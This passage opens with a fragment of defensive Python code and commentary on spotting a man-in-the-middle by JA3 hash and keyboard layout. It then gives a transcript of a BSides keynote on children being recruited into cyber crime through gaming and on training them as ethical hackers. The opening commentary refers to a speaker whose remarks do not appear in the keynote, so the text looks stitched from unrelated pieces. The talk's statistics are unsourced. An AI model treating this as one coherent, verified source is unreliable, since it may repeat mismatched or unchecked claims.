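    name = KNOWN_LAYOUTS.get(observed_klid, hex(observed_klid))
    return f"unexpected keyboard layout: {name}"
```

A Python-based MITM and a real Windows TLS stack produce different JA3 hashes, and a Cyrillic KLID on a Belgian user's session is exactly the anomaly the speaker describes.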
>> Awesome. Okay, let's get started. So, please take your seat if you want to, or, I see a lot of people still at the bar, just enjoy your drink and listen to our last presentation of the day: our closing keynote, which is, again, kind of about the kids, and how we can save them from a career in cyber crime. So, yeah, if you have kids it's very relevant for you, or if you're planning to. So, please welcome Fergus. Okay, to the stage. >> Thank you very much. >> Let's give him a round of applause. >> Oh, applause. >> If you don't applaud at the end, I know it's been a disaster. So, it's downhill from here. It's really, really great to be back at BSides. Actually, in the advert for this talk, it said I was a sector specialist. That is a total lie. So I have no credibility to stand up here, particularly at BSides. I'm not technical, I'm not a hacker, I've never worked in cyber security. So actually, I'm like half of you guys. Yeah. No, but we do a lot of presentations, and I always say, when I come to BSides anywhere in the world, it's the toughest crowd, because you guys are the real hackers in the world. So thank you for the invitation, and it's
a real privilege and pleasure to be here. I bribed a lot of people at the bar with some stickers, saying: if you want to talk about saving kids from cyber crime, come and listen to our little chat. I'm going to spend about 30-35 minutes talking to you about what myself and my co-founder Dan Deer, who comes from Amsterdam, have been doing for the last couple of years. We met because he asked me if I wanted to invest in cyber security. Dan has been in cyber security for 25 years, set up and sold a bunch of different businesses. And so I came over to learn, and I walked into a room with six hackers, I think Hugo was actually on the phone, and three hours later I walked out terrified. I got on a plane from Amsterdam to Zurich that afternoon. It's actually one of the most beautiful flights you can take, because you fly over the Alps and everyone's got their noses against the window, like, ooh, Toblerone, but in 5D. And there was just me, sitting on the other side of the plane, filled with parental paranoia, riding this thing going, "[ __ ] what's happening to the kids, why are they being groomed by the bad guys off gaming platforms, and why is no one doing anything about it?" I landed, I called Dan, and I said, "I think we're going to go from friends to co-founders, because I think we need to solve this problem." And that's the mission we're on. Our mission is to create a generation of ethical hackers to make the world safer. And the reasons why we're doing that are reasons you guys will know about. Just this year alone, the global cost of cyber crime is predicted to be $10.5 trillion. $10.5 trillion: that's the global cost of COVID according to the IMF. In two years' time, they think it's going to be $24 trillion. That seems like an impossible number; if it's true, that is the GDP of the United States. And obviously,
last year it was $8 trillion. So we know the rise of cyber crime is a real problem. But I think what's really, really scary is: who are the bad guys? Of course, we all talk about Iran and Russia and China and North Korea, and all of that is true. We also talk about the organized cyber gangs out of South America, South Asia, Eastern Europe, and Africa; also true. But what the data shows is that the vast majority of the people committing the crime are children. In fact, Europol published a report where they interviewed 14,000 teenagers across Europe and the UK: 69% of them have committed a cyber crime or a gross cyber misdemeanor. 69%. The FBI, who sit on our advisory board, will tell you that the average age of someone they arrest for serious crime is 37 years old, but the average age of someone they arrest for cyber crime is 19 years old. And in fact, if you just look at the media, you can see that it's a really big social issue. None of these stories are new to you guys, but for example, the guy who was arrested as the head of Lapsus$, and I'm not sure anyone really believes he was the head of Lapsus$, was an 18-year-old autistic kid from Oxford in the UK. Marks & Spencer, the Co-op, and Harrods, which are the biggest retailers in the UK, were hacked about four months ago; it cost a billion dollars of enterprise value. The four people arrested for that hack by the National Crime Agency were 17 years old, 19 years old, and two 20-year-olds. The hack on the government ministries in The Hague just a month ago was run by two Dutch teenagers who were recruited by Russian intelligence off Telegram. So what you're seeing is that the age profile of the cyber criminal gangs today is increasingly young. It is thought that Scattered Spider is also behind the Jaguar Land Rover hack that has cost Jaguar Land Rover $2.2 billion. It's put 140 businesses into
liquidation, and the UK government has now bailed out a foreign-owned company, try to put that together, for 1.5 billion pounds. So the impact of this youth cyber crime is really real, and it's a problem we are trying to understand: where does it come from, and what is the entry point? We feel like this generation is at an ethical fork in the road. They're either going to be a real liability to society, or they could be a real asset. And when we look into understanding who they are, what's super clear is that every hacker is a gamer. In fact, I sat with Jeff Man, whom some of you may know: he's the founder of the NSA's red teaming, and in the US he's one of the godfathers of BSides. He's an amazing guy. And I said, "Well, Jeff, you must be super technical, right? Because, you know, you're one of the old-school hackers." And he was like, "No, I'm not technical. Of course you need some technical skills, but they change every year. What you need is puzzle logic. You need pattern identification. You need to be able to see things other people don't see and solve things in a way that other people can't." And the way he learned to do that was sitting with his dad in, sorry Jeff, probably the 1960s, doing wooden puzzles and metal puzzles and playing chess and playing turn-based games, developing his puzzle logic that way. And in his mind, every single hacker is a gamer. And actually, you just have to go back to history. Look at the 1930s and the Second World War: Winston Churchill saw two ways to try to win the war. Get the Americans involved, we kind of might regret that at the moment, but get the Americans involved. And the second way was to solve the Enigma code. Enigma was the signals system the Germans were using to have the U-boats attack the merchant navy ships, all the supplies crossing the ocean. So what
Churchill did is he went to Alan Turing, an autistic mathematician, and we were with his grandson, actually, two nights ago. He said: Alan, we need corkscrew minds. We need the best corkscrew minds in our country, people who think differently, who think atypically, some would say diversely, to solve problems. So what Turing did is he developed a cryptographic puzzle, put that puzzle in the newspaper, and said: if you can solve this puzzle, you get an interview at Bletchley Park. And the puzzles were solved, and the people hired were predominantly neurodivergent, autistic, Polish, women, and this was the crew he put together to crack the Enigma code. So there is history to show that if you understand the gaming mindset, how people game, how people think, how people solve puzzles, and you look for those corkscrew minds, the people who think differently, the atypicals, then you can identify what a future hacker really looks like. And what that means today is that the next wave of hackers and cyber talent are gamers. I want to show you this kid, one of the founders of our youth community. Dylan, when he was 12 years old, during COVID, his high school wouldn't let him use Teams. So all of their friends were at home on their own, going crazy; there was no social interaction. We all
have a bit of PTSD off the back of that. And so what Dylan decided to do was to hack Microsoft. They're not a sponsor, are they? That's always a bit embarrassing if they're a sponsor. No, they're not on. They should be though. Uh we should call them. So, uh, he hacked Microsoft and he opened up Teams for 2 and a half weeks for his school friends so that they could all socialize. It actually spread like wildfire across the US. All the teenagers in all of the high schools got hold of it and started using it. He got pulled by the FBI after two and a half weeks and they referred the case to Microsoft and they said, "What do you
want to do? You want us to prosecute this kid?" But to their great credit, they didn't prosecute him. They gave him a job. And last year at Black Hat in Vegas, Dylan won bug bounty of the year at Microsoft. We think he earned about $300,000 last year from Microsoft, legitimately, through a specialist program just for his talent and abilities. And he developed all of his talent and abilities by learning how to hack computer games. So there is a whole wave of gamers out there who have got talent. In fact, there are 3.2 billion gamers on the planet. Just to put that into perspective, there are 3.5 billion football fans. 93% of Gen Z game. And
when you look at how they spend their time every day, what you'll see is that they spend 30 minutes a day on Snapchat, 50 minutes a day on TikTok, and 114 minutes a day gaming. In fact, The Times in the UK published a report last month that said British male teenagers are spending more time gaming than they are doing their homework. And of course, what happens is the school sees a corkscrew-minded, neurodiverse teenager who is spending all their time gaming and thinks they've checked out of school and they're dumb. But the reality is they're smarter than their computer science teacher. They know more than their math teacher. They find it completely boring and pointless. And the parents, they
think that Dylan is just wasting his time playing computer games in his bedroom. Why are you playing Fortnite, Dylan? But what they don't understand is that it's like a live laboratory for skills development. And so this talent is unidentified and unseen and missed. Unfortunately, the only people who have worked out this rich vein of talent are the bad guys. The bad guys have identified that they can spot young kids who are developing their skills from the age of 11 years old, and they can recruit them as hackers into their community. In fact, in 2024, 132,000 kids were groomed by cyber gangs through gaming platforms. That's a 30% year-on-year spike. And that's because the kids are motivated. And the use case
would be my son Rafa. Rafa is 11 years old and he plays Roblox, like 79 million other kids a day. Just to put that in perspective, the most watched bit of TV in the world, which happens once a year, is the Super Bowl. That's four hours of painful, patient viewing, it's a hard watch, and there are 120 million people watching it. So that's one and a half days of Roblox, and not even a day of Minecraft, which is 140 million people a day. And so, you take my son Rafa, he plays Roblox. He'll come up to me and go, "Dad, can I have 10 Robux to buy some stuff in the game?" And because I'm a perfect parent like
everyone else here, I will say no. And what he will do is he'll find a way. YouTube will teach him how to hack the game. Google will give him the tools. Discord will find him a community. And he'll put his skills to work. And when he starts hacking the games and getting what he wants, he starts to get noticed. And if he's really good, he starts to develop modification software. When I asked 300 kids in Manchester on Tuesday how many of them create modification software, it was over 50% of the room. So when they do that, they're getting on the radar. They're getting identified by the gangs.
It's like a cyber criminal GitHub, and they can see the talent of these kids. And then what happens is they approach Rafa and go, "Hey Rafa, you want to earn some Bitcoin? Why don't you come over to this Discord community and we'll put something together?" We have a 12-year-old kid, or he was 12 at the time. He hacked Roblox and in one day he stole a bunch of tokens that hadn't been released yet. He sold them on the secondary market. At 12 years old, he made $35,000 in a day. The next day he put that all into Bitcoin, and 18 months later he had a wallet with $400,000 in it. And his parents only... He's nodding. He's like, "I
wish my kid was like that." He maybe is. The next day he went up to his parents, and the only reason they found out is because he said, "At what point should I start paying tax?" Which may be self-selecting in itself. By the way, the threshold for a minor is $6,000, if anyone's worried about what your kid's up to. So the thing is, he's now part of our youth community and he's just finished an internship with us. He's now 15. He's now using his hacking skills for ethical hacking, and that's a sign that a kid can go well. We've come across an 11-year-old with $14 million in his bank account in Oxford. And I
remember his mom, who was a lawyer, saying, "I'm just really worried people are going to think Johnny's a criminal." I was like, "Well, he probably is a criminal." There's an eight-year-old we've come across who's got $4 million in a bank account. There is a kid, famously, in the Netherlands who at eight years old ordered an AK-47 to be delivered to his nice Bloemendaal suburban home. And you guys will know that story already. So the reality is these kids are super highly active. So how do we help them? How do we direct them away from this journey? This journey is actually one developed by the National Crime Agency in the UK and done